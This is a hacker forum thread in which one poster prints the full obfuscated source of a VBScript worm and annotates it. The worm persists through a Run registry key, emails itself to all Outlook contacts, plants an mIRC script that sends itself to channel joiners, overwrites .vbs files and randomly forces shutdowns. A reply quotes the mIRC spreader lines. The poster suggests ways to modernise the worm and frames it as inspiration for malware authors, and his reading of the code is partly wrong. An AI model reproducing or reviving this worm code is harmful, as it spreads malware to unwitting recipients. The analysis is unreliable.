iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Analyzing a vbs Worm
  • m0rph
    Posts: 332 
    #############################################################
    #
    #     This is what I like to call the \"head\" of the worm
    #
    #############################################################

    Set O6734VC6 = createobject(\"scripting.filesystemobject\")
    O78SS2L7 = O6734VC6.getspecialfolder(1)
    A6G1HQFH = O78SS2L7 & \"geilfingeren.jpg.vbs\"
    Set E828D4O2 = createobject(\"wscript.shell\")
    E828D4O2.regwrite \"HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWinUpdate\", \"wscript.exe \" & A6G1HQFH & \" %\"
    O6734VC6.copyfile wscript.scriptfullname, A6G1HQFH
    UB51PCQU
    If E828D4O2.regread(\"HKLMSOFTWAREMicrosoftWindowsCurrentVersionfingeren.aviUA1OM5IA\") <> 1 then
    KD8F5L2N
    End if
    If E828D4O2.regread(\"HKLMSOFTWAREMicrosoftWindowsCurrentVersionfingeren.aviD47AC8NJ\") <> 1 then
    HLVO1EDH \"\"
    End if

    #############################################################
    #
    #       The next part I like to refer to as the \"body\"
    # 
    #############################################################
    Function KD8F5L2N()
    Set O13Q767K = CreateObject(\"Outlook.Application\")
    If O13Q767K = \"Outlook\" Then
    Set LFSIH230 = O13Q767K.GetNameSpace(\"MAPI\")
    Set LLLK4LPL = LFSIH230.AddressLists
    For Each A4A83865 In LLLK4LPL
    If A4A83865.AddressEntries.Count <> 0 Then
    JM1R7N44 = A4A83865.AddressEntries.Count
    For NHF463JD = 1 To JM1R7N44
    Set OU435GC5 = O13Q767K.CreateItem(0)
    Set KP511I06 = A4A83865.AddressEntries(NHF463JD)
    OU435GC5.To = KP511I06.Address
    OU435GC5.Subject = \"Very Important!\"
    OU435GC5.Body = \"Hi:\" & vbcrlf & \"Please view this file, it's very important.\" & vbcrlf & \"\"
    execute \"set DH97CAIN =OU435GC5.\" & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
    IJ15SDEE = A6G1HQFH
    OU435GC5.DeleteAfterSubmit = True
    DH97CAIN.Add IJ15SDEE
    If OU435GC5.To <> \"\" Then
    OU435GC5.Send
    End If
    Next
    End If
    Next
    End If
    End function
    Function HLVO1EDH(AHAOA819)
    If AHAOA819 <> \"\" Then
    TJTE98P3 = E828D4O2.regread(\"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir\")
    If O6734VC6.fileexists(\"c:mircmirc.ini\") Then
    AHAOA819 = \"c:mirc\"
    ElseIf O6734VC6.fileexists(\"c:mirc32mirc.ini\") Then
    AHAOA819 = \"c:mirc32\"
    ElseIf O6734VC6.fileexists(TJTE98P3 & \"mircmirc.ini\") Then
    AHAOA819 = TJTE98P3 & \"mirc\"
    ElseIf O6734VC6.fileexists(TJTE98P3 & \"mirc32mirc.ini\") Then
    AHAOA819 = TJTE98P3 & \"mirc\"
    Else
    AHAOA819 = \"\"
    End If
    End If
    If AHAOA819 <> \"\" Then
    Set U127MJ5H = O6734VC6.CreateTextFile(AHAOA819 & \"script.ini\", True)
    U127MJ5H = \"[script]\" & vbCrLf & \"n0=on 1:JOIN:#:{\"
    U127MJ5H = U127MJ5H & vbCrLf & \"n0=on 1:JOIN:#:{\"
    U127MJ5H = U127MJ5H & vbCrLf & \"n1=  /if ( $nick == $me ) { halt }\"
    U127MJ5H = U127MJ5H & vbCrLf & \"n2=  /.\" & Chr(100) & Chr(99) & Chr(99) & \" send $nick \"
    U127MJ5H = U127MJ5H & A6G1HQFH
    U127MJ5H = U127MJ5H & vbCrLf & \"n3=}\"
    script.Close
    End If
    End Function
    Function J706734V()
    On Error Resume Next
    Set CKQ24CHB = O6734VC6.Drives
    For Each G2U828D4 In CKQ24CHB
    OC078SS2 = G2U828D4 & \"  \"
    Call L7R6G1HQ(OC078SS2)
    Next
    End Function

    Function L7R6G1HQ(FS6B51PC)
    Q35A1OM5 = FS6B51PC
    Set ITHD8F5L = O6734VC6.GetFolder(Q35A1OM5)
    Set G6F47AC8 = ITHD8F5L.Files
    For Each NFFLVO1E In G6F47AC8
    If lcase(NFFLVO1E.Name) = \"mirc.ini\" Then
    HLVO1EDH(NFFLVO1E.ParentFolder)
    End If
    If O6734VC6.GetExtensionName(NFFLVO1E.path) = \"vbs\"
    O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
    End if
    If O6734VC6.GetExtensionName(NFFLVO1E.path) = \"vbe\"
    O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
    End if
    Next
    Set VSM3BL08 = ITHD8F5L.Subfolders
    For Each UQFA0DCQ In VSM3BL08
    Call (UQFA0DCQ.path)
    Next
    End function


    #############################################################
    #
    #         and finally the \"tail\" so to speak.
    #
    #############################################################


    Function UB51PCQU()
    Randomize
    If 1 + Int(Rnd * 50) = 7 then
    E828D4O2.run \"RUNDLL32.EXE user.exe,exitwindows\"
    end if
    end function 

    ####################### End of Code #########################

    In the head of the worm, it first it writes itself to the Windows Update directory as a value for "wscript.exe" from the registry for
    all accounts on the machine as seen by the root directory of "HKLM" or HKEY_LOCAL_MACHINE. And procedes to read values from
    "fingeren.avi" to execute other functions within itself. This results in the worm being executed everytime Windows Update is initiated.

    In the body of the worm, it targets the Microsoft Outlook application as a form of propagating itself.
    It first registers Microsoft Outlook as an extension to the worm itself, by reading all of the contacts within one's address list. It
    then enumerates the addresses in a numerical order for creating an email to attach itself to. Once all of the emails it created have been
    sent out, it deletes them from Microsoft Outlook, so when the user logs in, he or she doesn't see any suspicious info.

    The next function in the body looks for a file called "mirc.ini" from what we as hackers know about malicious software, we can only assume it
    is refering to an Internet Relay Chat server as described within. After it reads the assumed irc server within the mirc.ini script it connects to
    it under a random nickname where the owner of this worm can send commands to it. We can assume the commands defined by this worm are written in
    a file called "script.ini" seeing as this function listens for commands under a variable defined as "script"

    The next function function appears to mount drives and folders on the local system. I'm not entirely positive but it looks to me as the next
    function attempts to create copies of the "mirc.ini" file. Of which I would think would give it more options to connect to the IRC server
    in the event of one of the "mirc.ini" files being deleted. It then appears to me that it copies the worm itself to all folders associated
    with a "mirc.ini" file.

    In the footer, I'm once again assuming that the code attempts to read the registry entries it made under the current user logged in. But, once
    again this may not be correct.

    My thoughts:
    I dont know for sure, but I think this is a variant of the "ILUVYOU" virus. In its current state it doesn't work, because there's no function
    to create the "mirc.ini" file. There's also no function that either creates, or defines within itself the commands that are to be found in
    "script.exe" for its communication with an IRC server. Also "user.exe" was discontinued from the cab file directory after Windows 2000.
    So not only will this not work, but it's also outdated.

    On a side note:
    VBscript is still supported in Windows 7, so if this code were completed by someone who knew how to write vbs very well, and
    rewritten in the last couple of statements so it ran itself under the current user's priviledges as described in newer versions
    of the Windows operating system, this worm could work. But one would also have to worry about reverse engineering tactics employed
    against this. Maybe the use of an encryption algorithm for protecting connection information being sent to the IRC server would suffice?

    This uses old school tactics, the kind of stuff the hardcore elite in the generation of hackers before ours used, back when direct
    attacks were almost null and writing programs like this was the rage. I find this a very interesting set of code, and a great place
    for malicious programmers to draw ideas and inspiration from when creating new projects.

    m0rph
    while( !(succeed = try() ) );
  • Sh3llc0d3
    Posts: 1,910
    WARNING: If you run Avast disable it when viewing this thread.
  • sangf
    Posts: 203
    interesting read~ i beleive the irc stuff is actually part of the spreader/worm itself, it searches for mirc.ini to find if the user has the mirc client installed (in c:\ and %programfiles%), if so it writes an mirc script to that directory (i beleive script1.ini is loaded by default) which makes the user send a vbs file to every person that joins any channel they are on.


    on 1:JOIN:#:{
       if ( $nick == $me ) { halt }
       .dcc send $nick geilfingeren.jpg.vbs
    }
Add a Comment